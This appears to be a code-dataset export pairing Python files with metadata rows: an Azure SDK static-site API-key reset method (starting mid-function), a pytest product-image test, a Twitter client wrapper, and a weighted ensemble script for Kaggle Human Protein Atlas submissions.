reset_properties_envelope: "_models.StaticSiteResetPropertiesARMResource",
**kwargs
) -> None:
"""Resets the api key for an existing static site.
Description for Resets the api key for an existing static site.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:param reset_properties_envelope: A JSON representation of the StaticSiteResetPropertiesARMResource properties.
:type reset_properties_envelope: ~azure.mgmt.web.v2020_09_01.models.StaticSiteResetPropertiesARMResource
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.reset_static_site_api_key.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(reset_properties_envelope, 'StaticSiteResetPropertiesARMResource')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
reset_static_site_api_key.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/resetapikey'} # type: ignore
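# Illustrative sketch for rotating the API key; the envelope field names
# (repository_token, should_update_repository) are assumptions about
# StaticSiteResetPropertiesARMResource.
#
#   from azure.mgmt.web.v2020_09_01.models import StaticSiteResetPropertiesARMResource
#
#   await client.static_sites.reset_static_site_api_key(
#       "my-rg", "my-static-site",
#       StaticSiteResetPropertiesARMResource(should_update_repository=False))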
| 50.306165 | 249 | 0.666753 | 10,501 | 96,286 | 5.884202 | 0.028378 | 0.02638 | 0.034391 | 0.024276 | 0.93575 | 0.92795 | 0.921071 | 0.908302 | 0.89898 | 0.888785 | 0 | 0.012478 | 0.229265 | 96,286 | 1,913 | 250 | 50.332462 | 0.820148 | 0.105612 | 0 | 0.838046 | 0 | 0.010283 | 0.158275 | 0.081019 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012853 | false | 0 | 0.006855 | 0 | 0.073693 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4a8176aeb45e1ffa100ff73c8a9741d3f405acaf | 181 | py | Python | Selenium/Opencart_windows_operations/test_image_upload.py | BahrmaLe/otus_python_homework | 510a4f1971b35048d760fcc45098e511b81bea31 | ["MIT"] | 1 | 2021-02-25T15:37:21.000Z | 2021-02-25T15:37:21.000Z | Selenium/Opencart_windows_operations/test_image_upload.py | BahrmaLe/otus_python_homework | 510a4f1971b35048d760fcc45098e511b81bea31 | ["MIT"] | null | null | null | Selenium/Opencart_windows_operations/test_image_upload.py | BahrmaLe/otus_python_homework | 510a4f1971b35048d760fcc45098e511b81bea31 | ["MIT"] | null | null | null |
# Relies on pytest fixtures provided elsewhere in the suite: `add_product_with_image`
# (product/image setup) and `find_product_image` (the stored image name/path asserted on below).
def test_image_name(add_product_with_image, find_product_image):
print(type(find_product_image))
print(find_product_image)
assert 'macbook_pro' in find_product_image
| 22.625 | 64 | 0.801105 | 27 | 181 | 4.851852 | 0.518519 | 0.335878 | 0.48855 | 0.320611 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.132597 | 181 | 7 | 65 | 25.857143 | 0.834395 | 0 | 0 | 0 | 0 | 0 | 0.061798 | 0 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.25 | false | 0 | 0 | 0 | 0.25 | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
434cde88cff137e984d86a958e97eaea51192d59 | 243 | py | Python | twitter/__init__.py | kwnktks0515/Twitter_with_Python | 80dff5e0f0080a7e5b64dfa134f2e33aba0ed5f8 | ["MIT"] | null | null | null | twitter/__init__.py | kwnktks0515/Twitter_with_Python | 80dff5e0f0080a7e5b64dfa134f2e33aba0ed5f8 | ["MIT"] | null | null | null | twitter/__init__.py | kwnktks0515/Twitter_with_Python | 80dff5e0f0080a7e5b64dfa134f2e33aba0ed5f8 | ["MIT"] | null | null | null |
"""init"""
from twitter.twitter import Twitter
def twitter(consumer_key, consumer_secret, access_token, access_token_secret):
"""return Twitter Class"""
return Twitter(consumer_key, consumer_secret, access_token, access_token_secret)
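# Illustrative usage sketch (credential strings are placeholders; the methods available
# on the returned object are defined in twitter/twitter.py and not shown here):
#
#   from twitter import twitter
#
#   client = twitter("CONSUMER_KEY", "CONSUMER_SECRET",
#                    "ACCESS_TOKEN", "ACCESS_TOKEN_SECRET")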
| 34.714286 | 84 | 0.790123 | 31 | 243 | 5.870968 | 0.387097 | 0.241758 | 0.197802 | 0.285714 | 0.659341 | 0.659341 | 0.659341 | 0.659341 | 0.659341 | 0.659341 | 0 | 0 | 0.111111 | 243 | 6 | 85 | 40.5 | 0.842593 | 0.102881 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
43716343f2b07b0c3a5a1b7f8a920c867f1c7062 | 19,896 | py | Python | vpp/src/result_summary_final.py | guitarmind/HPA-competition-solutions | 547d53aaca148fdb5f4585526ad7364dfa47967d | ["MIT"] | null | null | null | vpp/src/result_summary_final.py | guitarmind/HPA-competition-solutions | 547d53aaca148fdb5f4585526ad7364dfa47967d | ["MIT"] | null | null | null | vpp/src/result_summary_final.py | guitarmind/HPA-competition-solutions | 547d53aaca148fdb5f4585526ad7364dfa47967d | ["MIT"] | null | null | null |
# -*- coding: UTF-8 -*-
import os
import numpy as np
from utils.multi_thres_and_leak import use_threshold, replace_leak_write_result
# Average the per-model .npy score matrices (optionally weighted) and save the combined scores.
def summary_scores(score_files, save_path, weight=None, save_result=True):
print 'total {} result'.format(len(score_files)),
if weight is None:
weight = [1 for _ in xrange(len(score_files))]
assert len(score_files) == len(weight), 'Error length of score_files not equal to weight'
scores = []
for i, sub_file in enumerate(score_files):
scores.append(np.load(sub_file) * weight[i])
scores = np.array(scores)
ave_scores = np.sum(scores, 0) / sum(weight)
if save_result:
np.save(save_path, ave_scores)
print 'save to:', save_path
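# Illustrative note, not part of the original script: summary_scores stacks the per-model
# score matrices and saves their weighted element-wise mean. For example, with
# weight=[21, 10] (as used by summary_scores_inceptionv3_800 below) the saved array is
#   (21 * scores_a + 10 * scores_b) / 31
# for two equally shaped score matrices scores_a and scores_b.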
def summary_scores_lcp_inceptionv3_800():
score_files = [
# inceptionv3 800
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_0_epoch8_score.npy',
# 0.582
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_0_epoch18_score.npy',
# 0.578
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_1_epoch12_score.npy',
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_2_epoch15_score.npy',
# 0.580
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_3_epoch21_score.npy',
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_4_epoch14_score.npy',
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_4_epoch14_score.npy',
# 0.589
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_5_epoch13_score.npy',
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_6_epoch12_score.npy',
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_7_epoch12_score.npy',
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_8_epoch12_score.npy',
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_9_epoch12_score.npy',
]
save_path = './results/lcp_inceptionv3_800_score.npy'
summary_scores(score_files, save_path)
multi_thres_file = use_threshold(save_path)
def summary_scores_xie_inceptionv3_800():
score_files = [
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_3_epoch28_score.npy',
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_3_epoch9_score.npy',
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_1/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_1_3_epoch12_score.npy',
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_2/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_2_3_epoch12_score.npy',
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_3/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_3_3_epoch12_score.npy',
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_4/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_4_3_epoch12_score.npy',
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_3_epoch23_score.npy',
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_3_epoch13_score.npy',
]
save_path = './results/xie_inceptionv3_800_score.npy'
summary_scores(score_files, save_path)
multi_thres_file = use_threshold(save_path)
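# The next function blends the two InceptionV3-800 ensembles above with a fixed
# 21:10 weighting before thresholding.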
def summary_scores_inceptionv3_800():
summary_scores_lcp_inceptionv3_800()
summary_scores_xie_inceptionv3_800()
score_files = [
'./results/lcp_inceptionv3_800_score.npy',
'./results/xie_inceptionv3_800_score.npy']
save_path = './results/inceptionv3_800_score.npy'
summary_scores(score_files, save_path, weight=[21, 10])
multi_thres_file = use_threshold(save_path)
def summary_scores_inceptionv3_650():
score_files = [
# inceptionv3 650
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold_0_epoch13_score.npy',
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_5fold_pretrain/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_5fold_pretrain_3_epoch13_score.npy',
]
save_path = './results/inceptionv3_650_score.npy'
summary_scores(score_files, save_path)
multi_thres_file = use_threshold(save_path)
def summary_scores_inceptionv4_800():
score_files = [
# inceptionv4 800
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_0_epoch13_score.npy',
# 0.589
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_1_epoch12_score.npy',
# 0.587
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_2_epoch12_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_2_epoch15_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_3_epoch12_score.npy',
# 0.589
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_3_epoch16_score.npy',
# 0.589
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_4_epoch12_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_4_epoch15_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_5_epoch12_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_6_epoch16_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_7_epoch14_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_7_epoch20_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_8_epoch12_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_8_epoch22_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_9_epoch13_score.npy',
]
save_path = './results/inceptionv4_800_score.npy'
summary_scores(score_files, save_path)
multi_thres_file = use_threshold(save_path)
def summary_scores_inceptionv4_650():
score_files = [
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold_0_epoch17_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold_1_epoch14_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold_2_epoch13_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold_3_epoch16_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold_4_epoch15_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold_5_epoch13_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold_6_epoch13_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold_7_epoch14_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold_8_epoch16_score.npy',
]
save_path = './results/inceptionv4_650_score.npy'
summary_scores(score_files, save_path)
multi_thres_file = use_threshold(save_path)
def summary_scores_xception_800():
score_files = [
# xception 800
'./models/xception_fc/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_0_epoch14_score.npy',
# 0.577
'./models/xception_fc/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_1_epoch18_score.npy',
'./models/xception_fc/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_2_epoch18_score.npy',
'./models/xception_fc/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_3_epoch18_score.npy',
'./models/xception_fc/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_4_epoch14_score.npy',
'./models/xception_fc/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_5_epoch17_score.npy',
'./models/xception_fc/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_6_epoch13_score.npy',
'./models/xception_fc/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_7_epoch13_score.npy',
'./models/xception_fc/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_8_epoch13_score.npy',
'./models/xception_fc/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_9_epoch12_score.npy',
]
save_path = './results/xception_800_score.npy'
summary_scores(score_files, save_path)
multi_thres_file = use_threshold(save_path)
def summary_scores_xception_650():
score_files = [
# xception 650
'./models/xception_fc/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold/submit/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold_0_epoch8_score.npy',
# 0.592
]
save_path = './results/xception_650_score.npy'
summary_scores(score_files, save_path)
multi_thres_file = use_threshold(save_path)
def summary_scores_xception_512():
score_files = [
'./models/xception_fc/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_5fold/submit/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_5fold_0_epoch17_score.npy',
# 0.569
'./models/xception_fc/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_5fold/submit/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_5fold_1_epoch12_score.npy',
# 0.565
'./models/xception_fc/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_5fold/submit/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_5fold_3_epoch14_score.npy',
# 0.577
'./models/xception_fc/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm/submit/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_0_epoch22_score.npy',
# 0.572
'./models/xception_fc/xception_fc_offi_lr0.001_weightedsamper_mlsm_rms_lrexp_pretrain/submit/xception_fc_offi_lr0.001_weightedsamper_mlsm_rms_lrexp_pretrain_0_epoch6_score.npy',
# 0.574
]
save_path = './results/xception_512_score.npy'
summary_scores(score_files, save_path)
multi_thres_file = use_threshold(save_path)
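# The two feature_concat_* functions below average the 10-fold score files of an
# MLP head trained on concatenated InceptionV3/InceptionV4/Xception features
# (as the base_path names suggest), one per loss configuration.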
def feature_concat_incv3_incv4_xcep_fc():
# base_path = '/disk/223/xiejb231/unet_mxnet2ncnn/datasets/humanprotein/scripts/Ensemble/FC/inceptionv3v4x_fc_800_offi_hpa/lr0.05_exp_mlsm_sgd_1layer_dropout_2layer/submit/inceptionv3v4x_fc_800_offi_hpa_submission_fold'
base_path = './models/MLP/lr0.5_step_0.5_10_mlsm_sgd_2layer_10fold/submit/inceptionv3_inceptionv4_xception_800_offi_hpa_submission_fold'
score_files = [
base_path + '0_score.npy',
base_path + '1_score.npy',
base_path + '2_score.npy',
base_path + '3_score.npy',
base_path + '4_score.npy',
base_path + '5_score.npy',
base_path + '6_score.npy',
base_path + '7_score.npy',
base_path + '8_score.npy',
base_path + '9_score.npy',
]
save_path = './results/featureconcat_incv3_800_incv4_800_xcep_800_score.npy'
summary_scores(score_files, save_path)
multi_thres_file = use_threshold(save_path)
def feature_concat_incv3_incv4_xcep_fc_2():
# base_path = '/disk/223/xiejb231/unet_mxnet2ncnn/datasets/humanprotein/scripts/Ensemble/FC/inceptionv3v4x_fc_800_offi_hpa/lr0.05_exp_mlsm_sgd_1layer_dropout_2layer/submit/inceptionv3v4x_fc_800_offi_hpa_submission_fold'
base_path = './models/MLP/lr0.5_exp_bce_sgd_2layer_10fold/submit/inceptionv3_inceptionv4_xception_800_offi_hpa_submission_fold'
score_files = [
base_path + '0_score.npy',
base_path + '1_score.npy',
base_path + '2_score.npy',
base_path + '3_score.npy',
base_path + '4_score.npy',
base_path + '5_score.npy',
base_path + '6_score.npy',
base_path + '7_score.npy',
base_path + '8_score.npy',
base_path + '9_score.npy',
]
save_path = './results/featureconcat_incv3_800_incv4_800_xcep_800_2_score.npy'
summary_scores(score_files, save_path)
multi_thres_file = use_threshold(save_path)
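# Final blending: combine the per-architecture averaged scores with hand-tuned
# weights, apply thresholding, replace leak samples, and write the submission file.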
def summary_scores_any_sub():
score_files_weight = [
['./results/inceptionv3_800_score.npy', 31],
['./results/inceptionv3_650_score.npy', 11],
['./results/inceptionv4_800_score.npy', 21],
['./results/inceptionv4_650_score.npy', 6],
['./results/xception_800_score.npy', 9],
['./results/xception_650_score.npy', 2],
['./results/xception_512_score.npy', 15],
['./results/featureconcat_incv3_800_incv4_800_xcep_800_score.npy', 13], # 0.630
['./results/featureconcat_incv3_800_incv4_800_xcep_800_2_score.npy', 13]
]
score_files = [_[0] for _ in score_files_weight]
weight = [_[1] for _ in score_files_weight]
for _it in xrange(len(score_files)):
print os.path.basename(score_files[_it]), ':', weight[_it]
print weight
save_path = './results/summary_final_1_score.npy'
summary_scores(score_files, save_path, weight)
multi_thres_file = use_threshold(save_path)
final_commit_file = replace_leak_write_result(multi_thres_file, show_replace=False)
print '*' * 84
print '* It\'s our first final submission --> ' + final_commit_file + ' *'
print '*' * 84
def summary_scores_any_sub_2():
score_files_weight = [
[
'/disk/223/lichuanpeng/Project_Models/Kaggle/HumanProtein/result_summary/best_submit/summary_sub_646_score.npy',
1],
['/disk/223/lichuanpeng/Project_Models/Kaggle/HumanProtein/result_summary/best_submit/xie_646.npy', 1],
['/disk/223/lichuanpeng/Project_Models/Kaggle/HumanProtein/result_summary/best_submit/sub_9_645.npy', 1],
]
score_files = [_[0] for _ in score_files_weight]
weight = [_[1] for _ in score_files_weight]
for _it in xrange(len(score_files)):
print os.path.basename(score_files[_it]), ':', weight[_it]
save_path = './results/summary_final_2_score.npy'
summary_scores(score_files, save_path, weight)
multi_thres_file = use_threshold(save_path)
final_commit_file = replace_leak_write_result(multi_thres_file, show_replace=False)
print '*' * 85
    print '* It\'s our second final submission --> ' + final_commit_file + ' *'
print '*' * 85
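# Running this module regenerates every intermediate ensemble and then the two
# final submissions, in order.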
if __name__ == '__main__':
summary_scores_inceptionv3_800()
summary_scores_inceptionv3_650()
summary_scores_inceptionv4_800()
summary_scores_inceptionv4_650()
summary_scores_xception_512()
summary_scores_xception_800()
summary_scores_xception_650()
feature_concat_incv3_incv4_xcep_fc()
feature_concat_incv3_incv4_xcep_fc_2()
summary_scores_any_sub()
summary_scores_any_sub_2()
| 70.303887
| 223
| 0.818355
| 2,877
| 19,896
| 5.026764
| 0.058394
| 0.061955
| 0.085742
| 0.10289
| 0.926428
| 0.895035
| 0.874983
| 0.865648
| 0.861361
| 0.857696
| 0
| 0.088535
| 0.103036
| 19,896
| 282
| 224
| 70.553191
| 0.721842
| 0.031564
| 0
| 0.339286
| 0
| 0
| 0.690365
| 0.671344
| 0
| 0
| 0
| 0
| 0.004464
| 0
| null | null | 0
| 0.013393
| null | null | 0.049107
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 9